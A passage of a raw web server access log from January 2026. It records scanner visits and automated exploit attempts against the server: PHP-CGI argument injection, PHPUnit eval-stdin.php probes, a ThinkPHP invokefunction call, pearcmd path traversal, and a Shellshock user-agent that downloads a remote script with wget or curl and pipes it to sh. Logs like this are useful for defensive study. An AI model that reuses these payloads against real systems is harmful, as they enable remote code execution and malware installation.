"/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:12:35:39 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:36:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:43:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:12:45:12 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.207.99.1] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:45:12 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.207.99.1] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:45:13 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:13 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.207.99.1] [Length 154] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:13 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:14 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:14 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:15 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:15 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:16 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:16 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:16 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:17 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:17 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:18 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:18 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:18 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:19 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:19 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:20 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:20 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:21 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:21 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:22 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:22 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:22 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:23 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:23 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:23 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:24 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:24 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:24 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:25 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:25 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:26 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:26 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:26 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:27 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:27 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:28 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:28 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:28 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:28 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:29 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:29 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:45:29 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 103.207.99.1] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:12:46:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 167.94.138.44] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:12:46:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.44] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:46:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.44] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:46:16 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:12:46:34 +0000] 404 - GET http 92.249.249.197 "/login" [Client 167.94.138.44] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:12:46:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.44] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:48:49 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:13:14:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:13:21:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:13:26:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:13:37:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:13:42:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:13:42:30 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:13:51:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:13:52:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 111.228.9.192] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:13:52:21 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 111.228.9.192] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:13:52:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 111.228.9.192] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:13:52:24 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 111.228.9.192] [Length 154] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:13:52:46 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 111.228.9.192] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:13:54:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 90.176.38.84] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117." "-" +[17/Jan/2026:14:01:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:14:03:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:14:26:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:14:30:15 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:14:30:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:14:43:52 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:14:52:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:14:59:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.157.158.178] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Jan/2026:15:02:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 136.117.98.44] [Length 0] [Gzip -] "-" "-" +[17/Jan/2026:15:13:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.135.139.165] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Jan/2026:15:15:25 +0000] 400 - - http localhost "-" [Client 45.227.254.156] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:15:18:09 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[17/Jan/2026:15:18:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[17/Jan/2026:15:19:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:15:25:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:15:32:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 167.94.146.50] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:15:32:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:15:32:13 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:15:32:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:15:32:17 +0000] 404 - GET http 91.82.83.208 "/.well-known/security.txt" [Client 167.94.146.50] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:15:32:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:15:34:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:15:42:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:15:45:02 +0000] 400 - GET http 91.82.83.208 "/manager/html" [Client 20.102.108.84] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[17/Jan/2026:16:10:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:16:11:35 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:16:16:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:16:22:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 161.132.242.6] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[17/Jan/2026:16:34:31 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:16:34:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:16:36:21 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:16:59:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:17:02:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:17:11:07 +0000] 404 - GET http 91.82.83.208 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[17/Jan/2026:17:13:29 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:17:15:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:17:21:32 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[17/Jan/2026:17:21:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[17/Jan/2026:17:22:21 +0000] 404 - GET http 91.82.83.208 "/portal/redlion" [Client 128.203.200.182] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[17/Jan/2026:17:24:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:17:37:40 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70" "-" +[17/Jan/2026:17:37:56 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:17:40:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[17/Jan/2026:17:47:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:18:05:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 178.62.219.4] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" "-" +[17/Jan/2026:18:05:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 178.62.219.4] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:18:06:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:18:12:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:18:13:09 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:18:31:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:18:39:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:18:39:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:18:49:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.130.72.177] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Jan/2026:18:54:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 34.230.71.135] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[17/Jan/2026:18:57:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:19:03:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 